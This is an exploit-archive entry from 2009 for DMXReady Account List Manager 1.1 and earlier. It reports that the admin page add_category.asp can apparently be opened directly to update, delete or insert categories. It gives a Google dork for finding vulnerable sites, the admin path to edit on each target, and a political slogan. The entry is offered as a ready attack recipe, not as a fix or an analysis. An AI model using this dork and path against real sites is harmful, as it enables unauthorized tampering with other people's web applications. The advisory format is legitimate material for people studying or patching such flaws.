id: 4653
date: 01/13/2009
title: DMXReady Account List Manager <= 1.1 Contents Change Vulnerability
author: ajann
cves: 

==================================================================
DMXReady Account List Manager <= 1.1 Contents Change Vulnerability
==================================================================


*******************************************************************************
# Title   :  DMXReady Account List Manager <= 1.1 Remote Contents Change Vulnerability
# Author  :  "ajann" from Turkey
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  49.97 $
# Dork    :  inurl:inc_accountlistmanager.asp
# DorkEx  :

http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_accountlistmanager.asp&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

Permissions:
Update
Delete
Insert Category

# http://[target]/[path]/admin/AccountListManager/add_category.asp

Example: 
You Find -> http://[target]/[path]//applications/AccountListManager/inc_accountlistmanager.asp
Edit  ->    http://[target]/[path]//admin/AccountListManager/add_category.asp

 :)



#  0day.today [2023-03-26]  #